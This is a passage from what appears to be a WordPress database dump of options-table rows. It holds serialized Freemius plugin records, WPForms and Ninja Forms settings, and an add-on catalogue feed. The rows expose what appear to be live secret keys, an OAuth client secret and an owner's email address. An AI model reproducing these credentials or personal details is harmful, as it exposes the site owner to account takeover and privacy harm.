Twenty-Three\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:15:\"twentytwentytwo\";a:5:{s:4:\"slug\";s:15:\"twentytwentytwo\";s:7:\"version\";s:3:\"1.5\";s:5:\"title\";s:17:\"Twenty Twenty-Two\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:4:\"zinl\";a:5:{s:4:\"slug\";s:4:\"zinl\";s:7:\"version\";s:5:\"1.0.0\";s:5:\"title\";s:6:\"Finley\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}}}s:5:\"sites\";a:1:{s:15:\"ultimate-blocks\";O:7:\"FS_Site\":25:{s:7:\"site_id\";s:9:\"154723626\";s:9:\"plugin_id\";s:4:\"1798\";s:7:\"user_id\";s:7:\"7374248\";s:5:\"title\";s:7:\"GSW2023\";s:3:\"url\";s:19:\"https://gsw2023.com\";s:7:\"version\";s:5:\"3.0.2\";s:8:\"language\";s:5:\"en-US\";s:16:\"platform_version\";s:5:\"6.3.2\";s:11:\"sdk_version\";s:6:\"2.5.10\";s:28:\"programming_language_version\";s:6:\"8.0.29\";s:7:\"plan_id\";s:5:\"21349\";s:10:\"license_id\";N;s:13:\"trial_plan_id\";N;s:10:\"trial_ends\";N;s:10:\"is_premium\";b:0;s:15:\"is_disconnected\";b:0;s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;s:7:\"is_beta\";b:0;s:10:\"public_key\";s:32:\"pk_1ca98922771a35c87fc0f3367bd9d\";s:10:\"secret_key\";s:32:\"sk_p~bbEt[vB!R+WGo^LM(Gugm07sYRs\";s:2:\"id\";s:8:\"12933110\";s:7:\"updated\";s:19:\"2023-10-13 09:39:33\";s:7:\"created\";s:19:\"2023-08-25 06:21:44\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}}s:5:\"users\";a:1:{i:7374248;O:7:\"FS_User\":12:{s:5:\"email\";s:20:\"ay.zaghweb@gmail.com\";s:5:\"first\";s:5:\"Admin\";s:4:\"last\";s:0:\"\";s:11:\"is_verified\";b:0;s:11:\"customer_id\";N;s:5:\"gross\";N;s:10:\"public_key\";s:32:\"pk_84b1adf562146d95312ea1418ff71\";s:10:\"secret_key\";s:32:\"sk_uB;&gtjC]GSE]w_wNm>J7q#{GIAvQ\";s:2:\"id\";s:7:\"7374248\";s:7:\"updated\";N;s:7:\"created\";s:19:\"2023-08-25 06:21:44\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}}s:6:\"addons\";a:1:{i:1798;a:1:{i:0;O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"1798\";s:5:\"title\";s:19:\"Ultimate Blocks Pro\";s:4:\"slug\";s:19:\"ultimate-blocks-pro\";s:12:\"premium_slug\";s:19:\"ultimate-blocks-pro\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";N;s:19:\"is_wp_org_compliant\";b:0;s:22:\"premium_releases_count\";i:4;s:4:\"file\";N;s:7:\"version\";N;s:11:\"auto_update\";N;s:4:\"info\";O:14:\"FS_Plugin_Info\":13:{s:9:\"plugin_id\";s:5:\"12651\";s:11:\"description\";s:770:\"Ultimate Blocks Pro is a premium add-on for the widely used Ultimate Blocks plugin, specifically designed to enrich your website-building experience on WordPress. \n\nAs an advanced upgrade, it offers sophisticated features such as Saved Styles, which lets you store and reuse your preferred design styles, saving you time and ensuring consistency across your website. \n\nThe add-on also enhances your control over block options, providing advanced functionalities for better customization and flexibility. \n\nThe Pro add-on not only improves your workflow but also enables you to create more professional, dynamic, and aesthetically appealing content. Elevate your WordPress editing experience with Ultimate Blocks Pro, the ultimate companion to the Ultimate Blocks plugin.\";s:17:\"short_description\";s:130:\"The Pro version not only improves your workflow but also enables you to create more professional, engaging, and appealing content.\";s:10:\"banner_url\";s:68:\"https://s3-us-west-2.amazonaws.com/freemius/plugins/12651/banner.png\";s:15:\"card_banner_url\";s:73:\"https://s3-us-west-2.amazonaws.com/freemius/plugins/12651/card_banner.png\";s:15:\"selling_point_0\";s:44:\"Saved Styles For Easy Block Styles Variation\";s:15:\"selling_point_1\";s:22:\"Advanced Block Options\";s:15:\"selling_point_2\";s:19:\"More possibilities!\";s:11:\"screenshots\";N;s:2:\"id\";s:4:\"3532\";s:7:\"updated\";s:19:\"2023-05-18 03:12:33\";s:7:\"created\";s:19:\"2023-05-18 03:02:01\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_16ad0320a87c5e7d61d7e5a474ed0\";s:10:\"secret_key\";N;s:2:\"id\";s:5:\"12651\";s:7:\"updated\";s:19:\"2023-09-29 13:29:15\";s:7:\"created\";s:19:\"2023-05-07 21:51:37\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}}}}','yes'),
(56516,'fs_gdpr','a:1:{s:2:\"u1\";a:2:{s:8:\"required\";b:0;s:18:\"show_opt_in_notice\";b:0;}}','yes'),
(56517,'fs_api_cache','a:5:{s:26:\"get:/v1/users/7374248.json\";O:8:\"stdClass\":3:{s:6:\"result\";O:8:\"stdClass\":9:{s:5:\"email\";s:20:\"ay.zaghweb@gmail.com\";s:5:\"first\";s:5:\"Admin\";s:4:\"last\";s:0:\"\";s:11:\"is_verified\";b:0;s:10:\"secret_key\";s:32:\"sk_uB;&gtjC]GSE]w_wNm>J7q#{GIAvQ\";s:10:\"public_key\";s:32:\"pk_84b1adf562146d95312ea1418ff71\";s:2:\"id\";s:7:\"7374248\";s:7:\"created\";s:19:\"2023-08-25 06:21:44\";s:7:\"updated\";N;}s:7:\"created\";i:1692944504;s:9:\"timestamp\";i:1693030904;}s:30:\"get:/v1/installs/12933110.json\";O:8:\"stdClass\":3:{s:6:\"result\";O:8:\"stdClass\":33:{s:7:\"site_id\";s:9:\"154723626\";s:9:\"plugin_id\";s:4:\"1798\";s:7:\"user_id\";s:7:\"7374248\";s:3:\"url\";s:19:\"https://gsw2023.com\";s:5:\"title\";s:7:\"GSW2023\";s:7:\"version\";s:5:\"3.0.2\";s:7:\"plan_id\";s:5:\"21349\";s:10:\"license_id\";N;s:13:\"trial_plan_id\";N;s:10:\"trial_ends\";N;s:15:\"subscription_id\";N;s:5:\"gross\";i:0;s:12:\"country_code\";s:2:\"eg\";s:8:\"language\";s:5:\"en-US\";s:16:\"platform_version\";s:3:\"6.3\";s:11:\"sdk_version\";s:6:\"2.5.10\";s:28:\"programming_language_version\";s:6:\"8.0.29\";s:9:\"is_active\";b:1;s:15:\"is_disconnected\";b:0;s:10:\"is_premium\";b:0;s:14:\"is_uninstalled\";b:0;s:9:\"is_locked\";b:0;s:6:\"source\";i:0;s:8:\"upgraded\";N;s:12:\"last_seen_at\";s:19:\"2023-08-25 06:21:45\";s:26:\"last_served_update_version\";N;s:10:\"secret_key\";s:32:\"sk_p~bbEt[vB!R+WGo^LM(Gugm07sYRs\";s:10:\"public_key\";s:32:\"pk_1ca98922771a35c87fc0f3367bd9d\";s:2:\"id\";s:8:\"12933110\";s:7:\"created\";s:19:\"2023-08-25 06:21:44\";s:7:\"updated\";N;s:7:\"charset\";N;s:7:\"is_beta\";b:0;}s:7:\"created\";i:1692944504;s:9:\"timestamp\";i:1693030904;}s:45:\"get:/v1/users/7374248/plugins/1798/plans.json\";O:8:\"stdClass\":3:{s:6:\"result\";O:8:\"stdClass\":1:{s:5:\"plans\";a:1:{i:0;O:8:\"stdClass\":22:{s:9:\"plugin_id\";s:4:\"1798\";s:4:\"name\";s:4:\"free\";s:5:\"title\";s:4:\"Free\";s:11:\"description\";s:13:\"Free forever!\";s:17:\"is_free_localhost\";b:1;s:17:\"is_block_features\";b:1;s:25:\"is_block_features_monthly\";b:1;s:12:\"license_type\";i:0;s:16:\"is_https_support\";b:0;s:12:\"trial_period\";N;s:23:\"is_require_subscription\";b:0;s:10:\"support_kb\";N;s:13:\"support_forum\";N;s:13:\"support_email\";N;s:13:\"support_phone\";N;s:13:\"support_skype\";N;s:18:\"is_success_manager\";b:0;s:11:\"is_featured\";b:0;s:9:\"is_hidden\";b:0;s:2:\"id\";s:5:\"21349\";s:7:\"created\";s:19:\"2023-05-08 06:21:48\";s:7:\"updated\";N;}}}s:7:\"created\";i:1692944504;s:9:\"timestamp\";i:1693030904;}s:60:\"get:/v1/installs/12933110/addons.json?enriched=true&count=50\";O:8:\"stdClass\":3:{s:6:\"result\";O:8:\"stdClass\":1:{s:7:\"plugins\";a:1:{i:0;O:8:\"stdClass\":34:{s:16:\"parent_plugin_id\";s:4:\"1798\";s:12:\"developer_id\";s:4:\"1199\";s:8:\"store_id\";s:4:\"5632\";s:10:\"install_id\";s:8:\"12056339\";s:4:\"slug\";s:19:\"ultimate-blocks-pro\";s:5:\"title\";s:19:\"Ultimate Blocks Pro\";s:11:\"environment\";i:0;s:4:\"icon\";s:100:\"https://s3-us-west-2.amazonaws.com/freemius/plugins/12651/icons/94960e8a71e85efd6517ff0a25fd06ab.png\";s:15:\"default_plan_id\";s:5:\"21345\";s:5:\"plans\";i:21345;s:8:\"features\";N;s:17:\"money_back_period\";i:14;s:13:\"refund_policy\";s:6:\"strict\";s:24:\"annual_renewals_discount\";N;s:22:\"renewals_discount_type\";s:10:\"percentage\";s:11:\"is_released\";b:1;s:15:\"is_sdk_required\";b:1;s:18:\"is_pricing_visible\";b:1;s:19:\"is_wp_org_compliant\";b:0;s:6:\"is_off\";b:0;s:24:\"is_only_for_new_installs\";b:0;s:14:\"installs_limit\";N;s:19:\"free_releases_count\";i:0;s:22:\"premium_releases_count\";i:4;s:17:\"accepted_payments\";i:0;s:7:\"plan_id\";s:1:\"0\";s:4:\"type\";s:6:\"plugin\";s:9:\"is_static\";b:0;s:10:\"public_key\";s:32:\"pk_16ad0320a87c5e7d61d7e5a474ed0\";s:2:\"id\";s:5:\"12651\";s:7:\"created\";s:19:\"2023-05-07 21:51:37\";s:7:\"updated\";s:19:\"2023-09-29 13:29:15\";s:4:\"info\";O:8:\"stdClass\":13:{s:9:\"plugin_id\";s:5:\"12651\";s:3:\"url\";s:18:\"ultimateblocks.com\";s:11:\"description\";s:770:\"Ultimate Blocks Pro is a premium add-on for the widely used Ultimate Blocks plugin, specifically designed to enrich your website-building experience on WordPress. \n\nAs an advanced upgrade, it offers sophisticated features such as Saved Styles, which lets you store and reuse your preferred design styles, saving you time and ensuring consistency across your website. \n\nThe add-on also enhances your control over block options, providing advanced functionalities for better customization and flexibility. \n\nThe Pro add-on not only improves your workflow but also enables you to create more professional, dynamic, and aesthetically appealing content. Elevate your WordPress editing experience with Ultimate Blocks Pro, the ultimate companion to the Ultimate Blocks plugin.\";s:17:\"short_description\";s:130:\"The Pro version not only improves your workflow but also enables you to create more professional, engaging, and appealing content.\";s:10:\"banner_url\";s:68:\"https://s3-us-west-2.amazonaws.com/freemius/plugins/12651/banner.png\";s:15:\"card_banner_url\";s:73:\"https://s3-us-west-2.amazonaws.com/freemius/plugins/12651/card_banner.png\";s:15:\"selling_point_0\";s:44:\"Saved Styles For Easy Block Styles Variation\";s:15:\"selling_point_1\";s:22:\"Advanced Block Options\";s:15:\"selling_point_2\";s:19:\"More possibilities!\";s:11:\"screenshots\";N;s:2:\"id\";s:4:\"3532\";s:7:\"created\";s:19:\"2023-05-18 03:02:01\";s:7:\"updated\";s:19:\"2023-05-18 03:12:33\";}s:12:\"premium_slug\";s:19:\"ultimate-blocks-pro\";}}}s:7:\"created\";i:1696119030;s:9:\"timestamp\";i:1696205430;}s:47:\"get:/v1/users/7374248/licenses.json?type=active\";O:8:\"stdClass\":3:{s:6:\"result\";O:8:\"stdClass\":1:{s:8:\"licenses\";a:0:{}}s:7:\"created\";i:1696119030;s:9:\"timestamp\";i:1696205430;}}','no'),
(56520,'widget_is_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(56540,'is_menu_search','a:9:{s:5:\"menus\";a:2:{s:7:\"primary\";s:7:\"primary\";s:6:\"mobile\";s:6:\"mobile\";}s:9:\"menu_name\";a:1:{s:9:\"main-menu\";s:9:\"main-menu\";}s:10:\"menu_style\";s:8:\"dropdown\";s:20:\"menu_magnifier_color\";s:7:\"#ffffff\";s:15:\"menu_close_icon\";s:15:\"menu_close_icon\";s:10:\"menu_title\";s:0:\"\";s:16:\"menu_search_form\";s:1:\"0\";s:12:\"menu_classes\";s:0:\"\";s:9:\"menu_gcse\";s:0:\"\";}','yes'),
(57256,'action_scheduler_hybrid_store_demarkation','3318','yes'),
(57257,'schema-ActionScheduler_StoreSchema','6.0.1668260756','yes'),
(57258,'schema-ActionScheduler_LoggerSchema','3.0.1668260756','yes'),
(57259,'wpforms_version','1.8.3.1','yes'),
(57260,'wpforms_version_lite','1.8.3.1','yes'),
(57261,'wpforms_activated','a:1:{s:4:\"lite\";i:1668260756;}','yes'),
(57266,'action_scheduler_lock_async-request-runner','1698127801','yes'),
(57267,'wpforms_versions_lite','a:11:{s:5:\"1.5.9\";i:0;s:7:\"1.6.7.2\";i:0;s:5:\"1.6.8\";i:0;s:5:\"1.7.5\";i:0;s:7:\"1.7.5.1\";i:0;s:5:\"1.7.7\";i:0;s:5:\"1.7.8\";i:1668260757;s:7:\"1.8.0.2\";i:1680144820;s:5:\"1.8.2\";i:1692570777;s:5:\"1.8.3\";i:1692570792;s:7:\"1.8.3.1\";i:1692570777;}','yes'),
(57268,'widget_wpforms-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(57273,'wpforms_admin_notices','a:2:{s:14:\"review_request\";a:2:{s:4:\"time\";i:1668260759;s:9:\"dismissed\";b:0;}s:19:\"review_lite_request\";a:2:{s:4:\"time\";i:1675583799;s:9:\"dismissed\";b:1;}}','yes'),
(57275,'_transient_wpforms_htaccess_file','a:3:{s:4:\"size\";i:737;s:5:\"mtime\";i:1668260762;s:5:\"ctime\";i:1668260762;}','yes'),
(57281,'wpforms_email_summaries_fetch_info_blocks_last_run','1692570778','yes'),
(57282,'wpforms_process_forms_locator_status','completed','yes'),
(57290,'wpforms_builder_opened_date','1668260958','no'),
(57291,'wpforms_challenge','a:13:{s:6:\"status\";s:8:\"canceled\";s:4:\"step\";i:1;s:7:\"user_id\";i:1;s:7:\"form_id\";i:0;s:10:\"embed_page\";i:0;s:16:\"embed_page_title\";s:0:\"\";s:16:\"started_date_gmt\";s:19:\"2022-11-12 13:49:32\";s:17:\"finished_date_gmt\";s:19:\"2022-11-12 13:49:39\";s:13:\"seconds_spent\";i:5;s:12:\"seconds_left\";i:295;s:13:\"feedback_sent\";b:0;s:19:\"feedback_contact_me\";b:0;s:13:\"window_closed\";s:0:\"\";}','yes'),
(57299,'wpforms_forms_first_created','1668261037','no'),
(57337,'ninja_forms_oauth_client_secret','SPxt23vCwH9moYoKP7H4irRUq5FuvKi2aUFrEv3Q','yes'),
(57338,'ninja_forms_version','3.6.14','yes'),
(57339,'ninja_forms_db_version','1.4','no'),
(57340,'ninja_forms_required_updates','a:6:{s:19:\"CacheCollateActions\";s:19:\"2022-11-12 14:03:53\";s:17:\"CacheCollateForms\";s:19:\"2022-11-12 14:03:53\";s:18:\"CacheCollateFields\";s:19:\"2022-11-12 14:03:53\";s:19:\"CacheCollateObjects\";s:19:\"2022-11-12 14:03:53\";s:19:\"CacheCollateCleanup\";s:19:\"2022-11-12 14:03:53\";s:25:\"CacheFieldReconcilliation\";s:19:\"2022-11-12 14:03:53\";}','yes'),
(57341,'ninja_forms_settings','a:11:{s:11:\"date_format\";s:5:\"m/d/Y\";s:8:\"currency\";s:3:\"USD\";s:18:\"recaptcha_site_key\";s:0:\"\";s:20:\"recaptcha_secret_key\";s:0:\"\";s:20:\"recaptcha_site_key_3\";s:0:\"\";s:22:\"recaptcha_secret_key_3\";s:0:\"\";s:14:\"recaptcha_lang\";s:0:\"\";s:19:\"delete_on_uninstall\";i:0;s:21:\"disable_admin_notices\";i:0;s:16:\"builder_dev_mode\";i:0;s:18:\"opinionated_styles\";s:5:\"light\";}','yes'),
(57342,'ninja_forms_zuul','52','no'),
(57344,'ninja_forms_addons_feed','[{\"title\":\"Multi Step Forms\",\"image\":\"assets\\/img\\/add-ons\\/multi-step-forms.png\",\"content\":\"Give submissions a boost on any longer form by making it a multi-page form. Drag and drop fields between pages, add breadcrumb navigation, a progress bar, and loads more!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/multi-step-forms\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Multi+Step+Forms\",\"plugin\":\"ninja-forms-multi-part\\/multi-part.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/multi-step-forms\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Multi+Step+Forms+Docs\",\"version\":\"3.0.26\",\"categories\":[{\"name\":\"Look &amp; Feel\",\"slug\":\"look-feel\"},{\"name\":\"Developer\",\"slug\":\"developer\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"User\",\"slug\":\"user\"},{\"name\":\"Business\",\"slug\":\"business\"},{\"name\":\"Personal\",\"slug\":\"personal\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Form Function and Design\",\"slug\":\"form-function-design\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Basic 2022\",\"slug\":\"basic-2022\"},{\"name\":\"Plus 2022\",\"slug\":\"plus-2022\"},{\"name\":\"Pro 2022\",\"slug\":\"pro-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Most Popular\",\"slug\":\"most-popular\"}]},{\"title\":\"Front-End Posting\",\"image\":\"assets\\/img\\/add-ons\\/front-end-posting.png\",\"content\":\"Let users publish content just by submitting a form! Completely configurable including post type, title, even categories and tags. Set post status, author, and much more!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/post-creation\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Front-End+Posting\",\"plugin\":\"ninja-forms-post-creation\\/ninja-forms-post-creation.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/post-creation\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Front-End+Posting+Docs\",\"version\":\"3.0.10\",\"categories\":[{\"name\":\"Content Management\",\"slug\":\"content-management\"},{\"name\":\"Developer\",\"slug\":\"developer\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"User\",\"slug\":\"user\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Manage Users\",\"slug\":\"user-management\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"}]},{\"title\":\"Mailchimp\",\"image\":\"assets\\/img\\/add-ons\\/mailchimp.png\",\"content\":\"Bring new life to your lists with upgraded Mailchimp signup forms for WordPress! Easy to build and customize with no code required. Link to lists and interest groups!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/mailchimp\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Mailchimp\",\"plugin\":\"ninja-forms-mail-chimp\\/ninja-forms-mail-chimp.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/mailchimp\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Mailchimp+Docs\",\"version\":\"3.3.2\",\"categories\":[{\"name\":\"Email Marketing\",\"slug\":\"email-marketing\"},{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Business\",\"slug\":\"business\"},{\"name\":\"Personal\",\"slug\":\"personal\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Plus 2022\",\"slug\":\"plus-2022\"},{\"name\":\"Pro 2022\",\"slug\":\"pro-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"}]},{\"title\":\"Campaign Monitor\",\"image\":\"assets\\/img\\/add-ons\\/campaign-monitor.png\",\"content\":\"Make any form a custom crafted WordPress signup form for Campaign Monitor. Connect to any list, link form fields to list fields, and watch your lists grow!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/campaign-monitor\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Campaign+Monitor\",\"plugin\":\"ninja-forms-campaign-monitor\\/ninja-forms-campaign-monitor.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/campaign-monitor\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Campaign+Monitor+Docs\",\"version\":\"3.0.6\",\"categories\":[{\"name\":\"Email Marketing\",\"slug\":\"email-marketing\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Personal\",\"slug\":\"personal\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Plus 2022\",\"slug\":\"plus-2022\"},{\"name\":\"Pro 2022\",\"slug\":\"pro-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"}]},{\"title\":\"User Analytics\",\"image\":\"assets\\/img\\/add-ons\\/user-analytics.png\",\"content\":\"Get better data on where your form traffic is coming from with every submission. Add 12+ analytics fields including UTM values,  URL referrer, geo data, and more!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/user-analytics\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=User+Analytics\",\"plugin\":\"ninja-forms-user-analytics\\/ninja-forms-user-analytics.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/user-analytics\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=User+Analytics+Docs\",\"version\":\"3.0.1\",\"categories\":[{\"name\":\"Content Management\",\"slug\":\"content-management\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Manage Users\",\"slug\":\"user-management\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"}]},{\"title\":\"Constant Contact\",\"image\":\"assets\\/img\\/add-ons\\/constant-contact.png\",\"content\":\"Connect WordPress to Constant Contact with forms that you can build and design just the way you want, no tech skills required! Subscribe users to any list or interest group.\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/constant-contact\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Constant+Contact\",\"plugin\":\"ninja-forms-constant-contact\\/ninja-forms-constant-contact.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/constant-contact\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Constant+Contact+Docs\",\"version\":\"3.1.0\",\"categories\":[{\"name\":\"Email Marketing\",\"slug\":\"email-marketing\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Personal\",\"slug\":\"personal\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Plus 2022\",\"slug\":\"plus-2022\"},{\"name\":\"Pro 2022\",\"slug\":\"pro-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"}]},{\"title\":\"AWeber\",\"image\":\"assets\\/img\\/add-ons\\/aweber.png\",\"content\":\"Build your lists faster with easy to design, professional quality WordPress signup forms. No technical skills required. Connect WordPress to AWeber with style!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/aweber\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=AWeber\",\"plugin\":\"ninja-forms-aweber\\/ninja-forms-aweber.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/aweber\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=AWeber+Docs\",\"version\":\"3.2.0\",\"categories\":[{\"name\":\"Email Marketing\",\"slug\":\"email-marketing\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"}]},{\"title\":\"PayPal Express\",\"image\":\"assets\\/img\\/add-ons\\/paypal-express.png\",\"content\":\"Set up any form to accept PayPal payments with PayPal Express for WordPress! Base totals on a fixed amount, user entered amount, or a calculated total.\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/paypal-express\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=PayPal+Express\",\"plugin\":\"ninja-forms-paypal-express\\/ninja-forms-paypal-express.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/paypal-express\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=PayPal+Express+Docs\",\"version\":\"3.1.2\",\"categories\":[{\"name\":\"Payment Gateways\",\"slug\":\"payment-gateways\"},{\"name\":\"Developer\",\"slug\":\"developer\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"User\",\"slug\":\"user\"},{\"name\":\"Business\",\"slug\":\"business\"},{\"name\":\"Personal\",\"slug\":\"personal\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Plus 2022\",\"slug\":\"plus-2022\"},{\"name\":\"Pro 2022\",\"slug\":\"pro-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"}]},{\"title\":\"MailPoet\",\"image\":\"assets\\/img\\/add-ons\\/mailpoet.png\",\"content\":\"Say hello better! Customize your MailPoet signup forms to draw more subscribers than ever before. Connect WordPress to any MailPoet list in minutes!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/mailpoet\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=MailPoet\",\"plugin\":\"ninja-forms-mailpoet\\/nf-mailpoet.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/mailpoet\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=MailPoet+Docs\",\"version\":\"3.0.1\",\"categories\":[{\"name\":\"Email Marketing\",\"slug\":\"email-marketing\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"}]},{\"title\":\"Zoho CRM\",\"image\":\"assets\\/img\\/add-ons\\/zoho-crm.png\",\"content\":\"Customize your forms to get the most out of your connection between WordPress and Zoho. Link form fields directly to Zoho fields, custom fields included, from almost any module.\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/zoho-crm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Zoho+CRM\",\"plugin\":\"ninja-forms-zoho-crm\\/ninja-forms-zoho-crm.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/zoho-crm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Zoho+CRM+Docs\",\"version\":\"3.5.0\",\"categories\":[{\"name\":\"CRM Integrations\",\"slug\":\"crm-integrations\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"}]},{\"title\":\"Capsule CRM\",\"image\":\"assets\\/img\\/add-ons\\/capsule-crm.png\",\"content\":\"Boost conversions from WordPress to Capsule with forms tailor made to your audience. Link form fields to Capsule fields from a wide range of modules. Custom fields too!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/capsule-crm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Capsule+CRM\",\"plugin\":\"ninja-forms-capsule-crm\\/ninja-forms-capsule-crm.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/capsule-crm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Capsule+CRM+Docs\",\"version\":\"3.4.2\",\"categories\":[{\"name\":\"CRM Integrations\",\"slug\":\"crm-integrations\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 